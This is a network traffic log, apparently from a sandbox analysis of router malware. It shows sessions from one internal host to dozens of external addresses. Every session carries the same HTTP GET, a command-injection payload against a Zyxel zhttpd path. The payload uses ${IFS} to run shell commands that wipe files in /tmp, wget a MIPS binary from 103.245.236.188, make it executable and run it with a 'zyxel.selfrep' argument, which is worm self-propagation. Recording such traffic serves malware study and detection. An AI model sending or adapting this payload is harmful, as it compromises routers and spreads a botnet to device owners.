                                                Jan 12, 2024 18:16:12.186367035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1621192.168.2.234083261.69.172.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186394930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1622192.168.2.235625638.104.1.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186433077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1623192.168.2.23586868.0.213.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186471939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1624192.168.2.234793018.145.61.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186494112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1625192.168.2.235154876.109.173.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186522961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1626192.168.2.2348322101.195.201.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186573982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1627192.168.2.2359866159.57.192.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186595917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1628192.168.2.235294697.253.249.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186656952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1629192.168.2.2333166165.255.173.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186681986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1630192.168.2.2335804162.22.49.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186732054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1631192.168.2.233842492.133.118.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186758041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1632192.168.2.234981458.160.59.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186791897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1633192.168.2.234379434.95.187.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186821938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1634192.168.2.2339840120.165.112.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186867952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1635192.168.2.2337912105.80.18.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186903954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1636192.168.2.2358370135.3.253.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186933041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1637192.168.2.233935847.106.154.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186964989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1638192.168.2.2340066199.126.60.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187002897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1639192.168.2.233437079.248.133.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187036991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1640192.168.2.2334518147.4.46.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187073946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1641192.168.2.23429522.245.26.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187122107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1642192.168.2.233705096.47.194.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187148094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1643192.168.2.234405858.212.159.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187179089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1644192.168.2.2352202104.174.11.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187201023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1645192.168.2.2338482154.42.134.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187253952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1646192.168.2.235199674.48.220.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187289000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1647192.168.2.234149060.25.150.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187339067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1648192.168.2.2347866187.197.143.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187351942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1649192.168.2.236051689.238.156.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187403917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1650192.168.2.2348456154.51.164.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187443972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1651192.168.2.2353670162.60.230.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187494040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1652192.168.2.2350660112.252.31.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187516928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1653192.168.2.2355198190.236.68.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187532902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1654192.168.2.2335548207.33.119.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187583923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1655192.168.2.235890217.171.142.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187638044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1656192.168.2.2344642189.252.190.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187671900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1657192.168.2.2340664192.119.222.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187717915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1658192.168.2.2355032206.70.40.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187738895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1659192.168.2.2345226197.91.187.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187783957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1660192.168.2.2360904202.224.31.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187807083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1661192.168.2.235652238.161.19.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187861919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1662192.168.2.234020037.91.179.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187877893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1663192.168.2.234548212.181.95.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187907934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1664192.168.2.235824234.236.30.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187958002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1665192.168.2.233864035.90.249.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.187997103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1666192.168.2.233888817.251.31.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188031912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1667192.168.2.235667485.108.8.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188071012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1668192.168.2.2341284156.186.68.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188098907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1669192.168.2.2341458138.47.108.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188141108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1670192.168.2.2347876100.30.100.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188185930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1671192.168.2.2336412103.193.58.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188210011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1672192.168.2.235140680.38.201.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188252926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1673192.168.2.2333710191.44.119.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188294888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1674192.168.2.2332934124.205.69.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188325882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1675192.168.2.2354214133.113.186.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188350916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1676192.168.2.235377866.21.138.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188396931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1677192.168.2.2358084184.242.96.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188452005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1678192.168.2.2349956197.66.9.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188505888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1679192.168.2.234760464.139.219.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188536882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1680192.168.2.233294854.158.118.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188570023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1681192.168.2.2333478133.1.251.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188601017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1682192.168.2.235651494.204.205.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.188653946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1683192.168.2.235991482.238.117.38443
                                                TimestampBytes transferredDirectionData
